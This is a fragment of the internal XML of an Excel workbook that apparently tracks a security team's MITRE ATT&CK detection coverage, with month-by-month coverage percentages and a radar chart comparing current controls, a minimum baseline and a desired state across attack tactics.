  </si>
  <si>
    <t>Defense Evasion, Execution Total</t>
  </si>
  <si>
    <t>Defense Evasion, Initial Access, Persistence, Privilege Escalation Total</t>
  </si>
  <si>
    <t>Defense Evasion, Lateral Movement Total</t>
  </si>
  <si>
    <t>Defense Evasion, Persistence Total</t>
  </si>
  <si>
    <t>Defense Evasion, Persistence, Privilege Escalation Total</t>
  </si>
  <si>
    <t>Defense Evasion, Privilege Escalation Total</t>
  </si>
  <si>
    <t>Discovery Total</t>
  </si>
  <si>
    <t>Execution Total</t>
  </si>
  <si>
    <t>Execution, Lateral Movement Total</t>
  </si>
  <si>
    <t>Execution, Persistence, Privilege Escalation Total</t>
  </si>
  <si>
    <t>Exfiltration Total</t>
  </si>
  <si>
    <t>Impact Total</t>
  </si>
  <si>
    <t>Initial Access Total</t>
  </si>
  <si>
    <t>Initial Access, Lateral Movement Total</t>
  </si>
  <si>
    <t>Initial Access, Persistence Total</t>
  </si>
  <si>
    <t>Lateral Movement Total</t>
  </si>
  <si>
    <t>Persistence Total</t>
  </si>
  <si>
    <t>Persistence, Privilege Escalation Total</t>
  </si>
  <si>
    <t>Privilege Escalation Total</t>
  </si>
  <si>
    <t>Reconnaissance Total</t>
  </si>
  <si>
    <t>Resource Development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</si>
</sst>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1"/>
      <color rgb="FF000000"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <strike/>
      <sz val="11"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF000000"/>
      <name val="Calibri"/>
      <family val="2"/>
    </font>
  </fonts>
  <fills count="19">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rgb="FFFFF2CC"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFFE699"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFDDEBF7"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFBDD7EE"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFC6E0B4"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FF92D050"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFD9D9D9"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFF000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8D3C0"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFB5E1F2"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFD5E9CD"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
  </fills>
  <borders count="5">
    <border>
      <left/>
      <right/>
      <top/>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right style="thin">
        <color auto="1"/>
      </right>
      <top/>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right style="thin">
        <color auto="1"/>
      </right>
      <top/>
      <bottom style="thin">
        <color indexed="64"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="thin">
        <color indexed="64"/>
      </left>
      <right style="thin">
        <color auto="1"/>
      </right>
      <top/>
      <bottom style="thin">
        <color indexed="64"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="thin">
        <color indexed="64"/>
      </left>
      <right/>
      <top/>
      <bottom style="thin">
        <color indexed="64"/>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horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="2" borderId="3" xfId="0" applyFont="1" applyFill="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center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="4" borderId="0" xfId="0" applyFill="1"/>
    <xf numFmtId="0" fontId="0" fillId="5" borderId="0" xfId="0" applyFill="1"/>
    <xf numFmtId="0" fontId="0" fillId="6" borderId="0" xfId="0" applyFill="1"/>
    <xf numFmtId="0" fontId="0" fillId="11" borderId="0" xfId="0" applyFill="1"/>
    <xf numFmtId="0" fontId="0" fillId="9" borderId="0" xfId="0" applyFill="1"/>
    <xf numFmtId="0" fontId="0" fillId="12" borderId="0" xfId="0" applyFill="1"/>
    <xf numFmtId="0" fontId="0" fillId="7" borderId="0" xfId="0" applyFill="1"/>
    <xf numFmtId="0" fontId="0" fillId="8" borderId="0" xfId="0" applyFill="1"/>
    <xf numFmtId="0" fontId="0" fillId="10" borderId="0" xfId="0" applyFill="1"/>
    <xf numFmtId="0" fontId="1" fillId="13" borderId="0" xfId="0" applyFont="1" applyFill="1"/>
    <xf numFmtId="0" fontId="0" fillId="2" borderId="0" xfId="0" applyFill="1"/>
    <xf numFmtId="0" fontId="0" fillId="3" borderId="0" xfId="0" applyFill="1"/>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="0" applyFont="1"/>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="4" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyBorder="1"/>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="0" xfId="0" applyFont="1"/>
    <xf numFmtId="9" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1"/>
    <xf numFmtId="0" fontId="1" fillId="8" borderId="0" xfId="0" applyFont="1" applyFill="1"/>
    <xf numFmtId="0" fontId="1" fillId="14" borderId="0" xfId="0" applyFont="1" applyFill="1"/>
    <xf numFmtId="0" fontId="0" fillId="15" borderId="0" xfId="0" applyFill="1"/>
    <xf numFmtId="0" fontId="0" fillId="18" borderId="0" xfId="0" applyFill="1"/>
    <xf numFmtId="0" fontId="4" fillId="17" borderId="0" xfId="0" applyFont="1" applyFill="1"/>
    <xf numFmtId="0" fontId="4" fillId="16" borderId="0" xfId="0" applyFont="1" applyFill="1"/>
    <xf numFmtId="0" fontId="1" fillId="2" borderId="3" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="3" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="9" fontId="6" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1"/>
    <xf numFmtId="0" fontId="0" fillId="13" borderId="0" xfId="0" applyFill="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" pivotButton="1"/>
  </cellXfs>
  <cellStyles count="1">
    <cellStyle name="Normal" xfId="0" builtinId="0"/>
  </cellStyles>
  <dxfs count="17">
    <dxf>
      <fill>
        <patternFill>
          <bgColor rgb="FFC6E0B4"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <bgColor rgb="FFFF0000"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill patternType="solid">
          <bgColor rgb="FFFFF2CC"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <bgColor rgb="FF92D050"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <strike/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FFD9D9D9"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <border diagonalUp="0" diagonalDown="0">
        <left/>
        <right style="thin">
          <color auto="1"/>
        </right>
        <top/>
        <bottom/>
        <vertical/>
        <horizontal/>
      </border>
    </dxf>
    <dxf>
      <alignment horizontal="center" vertical="center" textRotation="0" wrapText="0" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>
      <border outline="0">
        <top style="thin">
          <color auto="1"/>
        </top>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bottom/>
      </border>
    </dxf>
    <dxf>
      <alignment wrapText="0"/>
    </dxf>
    <dxf>
      <alignment wrapText="0"/>
    </dxf>
    <dxf>
      <alignment wrapText="0"/>
    </dxf>
    <dxf>
      <border outline="0">
        <top style="thin">
          <color auto="1"/>
        </top>
      </border>
    </dxf>
    <dxf>
      <alignment wrapText="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border>
    </dxf>
  </dxfs>
  <tableStyles count="0" defaultTableStyle="TableStyleMedium9" defaultPivotStyle="PivotStyleLight16"/>
  <colors>
    <mruColors>
      <color rgb="FFF8D3C0"/>
      <color rgb="FFD5E9CD"/>
      <color rgb="FFB5E1F2"/>
      <color rgb="FF1DEFF2"/>
      <color rgb="FFFFF2CC"/>
      <color rgb="FFFFE699"/>
      <color rgb="FF2DC653"/>
      <color rgb="FF70E000"/>
      <color rgb="FF38B000"/>
      <color rgb="FF007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MITRE ATT&amp;CK Framework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'Basic Progress'!$A$2</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>March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Progress'!$P$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Coverage</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'Basic Progress'!$P$2</c:f>
              <c:numCache>
                <c:formatCode>0%</c:formatCode>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>0.24785714285714291</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000002-20C6-490A-AAC6-8141AF4B90BE}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:strRef>
              <c:f>'Basic Progress'!$A$3</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>April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Progress'!$P$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Coverage</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'Basic Progress'!$P$3</c:f>
              <c:numCache>
                <c:formatCode>0%</c:formatCode>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>0.5210246681787275</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000004-20C6-490A-AAC6-8141AF4B90BE}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="2"/>
          <c:order val="2"/>
          <c:tx>
            <c:strRef>
              <c:f>'Basic Progress'!$A$4</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>May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Progress'!$P$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Coverage</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'Basic Progress'!$P$4</c:f>
              <c:numCache>
                <c:formatCode>0%</c:formatCode>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>0.57571428571428573</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000006-20C6-490A-AAC6-8141AF4B90BE}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="3"/>
          <c:order val="3"/>
          <c:tx>
            <c:strRef>
              <c:f>'Basic Progress'!$A$5</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>June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Progress'!$P$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Coverage</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'Basic Progress'!$P$5</c:f>
              <c:numCache>
                <c:formatCode>0%</c:formatCode>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>0.5933308896706464</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000008-20C6-490A-AAC6-8141AF4B90BE}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="4"/>
          <c:order val="4"/>
          <c:tx>
            <c:strRef>
              <c:f>'Basic Progress'!$A$6</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>July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Progress'!$P$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Coverage</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'Basic Progress'!$P$6</c:f>
              <c:numCache>
                <c:formatCode>0%</c:formatCode>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>0.63333088967064599</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{0000000A-20C6-490A-AAC6-8141AF4B90BE}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="5"/>
          <c:order val="5"/>
          <c:tx>
            <c:strRef>
              <c:f>'Basic Progress'!$A$7</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>August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Progress'!$P$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Coverage</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'Basic Progress'!$P$7</c:f>
              <c:numCache>
                <c:formatCode>0%</c:formatCode>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>0.64309582263718856</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{0000000C-20C6-490A-AAC6-8141AF4B90BE}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="6"/>
          <c:order val="6"/>
          <c:tx>
            <c:strRef>
              <c:f>'Basic Progress'!$A$8</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>September</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Progress'!$P$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Coverage</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'Basic Progress'!$P$8</c:f>
              <c:numCache>
                <c:formatCode>0%</c:formatCode>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>0.64383987025623612</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{0000000E-20C6-490A-AAC6-8141AF4B90BE}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="7"/>
          <c:order val="7"/>
          <c:tx>
            <c:strRef>
              <c:f>'Basic Progress'!$A$9</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>October</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Progress'!$P$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Coverage</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'Basic Progress'!$P$9</c:f>
              <c:numCache>
                <c:formatCode>0%</c:formatCode>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>0.65</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000010-20C6-490A-AAC6-8141AF4B90BE}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="8"/>
          <c:order val="8"/>
          <c:tx>
            <c:strRef>
              <c:f>'Basic Progress'!$A$10</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>November</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Progress'!$P$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Coverage</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'Basic Progress'!$P$10</c:f>
              <c:numCache>
                <c:formatCode>0%</c:formatCode>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>0.65499437305318087</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000012-20C6-490A-AAC6-8141AF4B90BE}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="9"/>
          <c:order val="9"/>
          <c:tx>
            <c:strRef>
              <c:f>'Basic Progress'!$A$11</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>December</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Progress'!$P$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Coverage</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'Basic Progress'!$P$11</c:f>
              <c:numCache>
                <c:formatCode>0%</c:formatCode>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>0</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000014-20C6-490A-AAC6-8141AF4B90BE}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="0"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:gapWidth val="219"/>
        <c:axId val="915203592"/>
        <c:axId val="915205640"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="915203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05640"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="91520564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Covered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203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MITRE ATT&amp;CK Framework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'Advanced Progress'!$A$4</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Current Controls</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:ln w="28575" cap="rnd">
              <a:solidFill>
                <a:srgbClr val="FABF8F"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
            <a:effectLst/>
          </c:spPr>
          <c:marker>
            <c:symbol val="circle"/>
            <c:size val="5"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="FABF8F"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:solidFill>
                  <a:srgbClr val="FABF8F"/>
                </a:solidFill>
                <a:prstDash val="solid"/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
          </c:marker>
          <c:cat>
            <c:strRef>
              <c:f>'Advanced Progress'!$B$1:$O$1</c:f>
              <c:strCache>
                <c:ptCount val="14"/>
                <c:pt idx="0">
                  <c:v>Reconnaissance</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>Resource Development</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>Initial Access</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>Execution</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>Persistence</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>Privilege Escalation</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>Defense Evasion</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>Credential Access</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>Discovery</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>Lateral Movement</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>Collection</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>Command and Control</c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>Exfiltration</c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>Impact</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'Advanced Progress'!$B$4:$O$4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4-CD00-4C2E-822D-D38AEE873645}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:strRef>
              <c:f>'Advanced Progress'!$A$2</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Minimum Baseline</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:ln w="28575" cap="rnd">
              <a:solidFill>
                <a:srgbClr val="92CDDC"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
            <a:effectLst/>
          </c:spPr>
          <c:marker>
            <c:symbol val="circle"/>
            <c:size val="5"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="92CDDC"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:solidFill>
                  <a:srgbClr val="92CDDC"/>
                </a:solidFill>
                <a:prstDash val="solid"/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
          </c:marker>
          <c:cat>
            <c:strRef>
              <c:f>'Advanced Progress'!$B$1:$O$1</c:f>
              <c:strCache>
                <c:ptCount val="14"/>
                <c:pt idx="0">
                  <c:v>Reconnaissance</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>Resource Development</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>Initial Access</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>Execution</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>Persistence</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>Privilege Escalation</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>Defense Evasion</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>Credential Access</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>Discovery</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>Lateral Movement</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>Collection</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>Command and Control</c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>Exfiltration</c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>Impact</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'Advanced Progress'!$B$2:$O$2</c:f>
              <c:numCache>
                <c:formatCode>0%</c:formatCode>
                <c:ptCount val="14"/>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numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000006-CD00-4C2E-822D-D38AEE873645}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="2"/>
          <c:order val="2"/>
          <c:tx>
            <c:strRef>
              <c:f>'Advanced Progress'!$A$3</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Desired State</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:ln w="28575" cap="rnd">
              <a:solidFill>
                <a:srgbClr val="92D050"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
            <a:effectLst/>
          </c:spPr>
          <c:marker>
            <c:symbol val="circle"/>
            <c:size val="5"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="92D050"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:prstDash val="solid"/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
          </c:marker>
          <c:cat>
            <c:strRef>
              <c:f>'Advanced Progress'!$B$1:$O$1</c:f>
              <c:strCache>
                <c:ptCount val="14"/>
                <c:pt idx="0">
                  <c:v>Reconnaissance</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>Resource Development</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>Initial Access</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>Execution</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>Persistence</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>Privilege Escalation</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>Defense Evasion</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>Credential Access</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>Discovery</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>Lateral Movement</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>Collection</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>Command and Control</c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>Exfiltration</c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>Impact</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'Advanced Progress'!$B$3:$O$3</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extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000008-CD00-4C2E-822D-D38AEE873645}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="0"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:axId val="579663367"/>
        <c:axId val="579665415"/>
      </c:radarChart>
      <c:catAx>
        <c:axId val="579663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65415"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="579665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633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666750</xdr:colOff>
      <xdr:row>11</xdr:row>
      <xdr:rowOff>0</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>9</xdr:col>
      <xdr:colOff>619125</xdr:colOff>
      <xdr:row>24</xdr:row>
      <xdr:rowOff>171450</xdr:rowOff>
    </xdr:to>
    <xdr:graphicFrame macro="">
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="45" name="Chart 3">
          <a:extLst>
            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B25AC5F5-1637-697A-66EF-36CDFAAC2EAA}"/>
            </a:ext>
            <a:ext uri="{147F2762-F138-4A5C-976F-8EAC2B608ADB}">
              <a16:predDERef xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" pred="{7659EAC4-F940-A12D-B1DE-7FB986189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28575</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>11</xdr:col>
      <xdr:colOff>238125</xdr:colOff>
      <xdr:row>31</xdr:row>
      <xdr:rowOff>95250</xdr:rowOff>
    </xdr:to>
    <xdr:graphicFrame macro="">
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="6" name="Chart 5">
          <a:extLst>
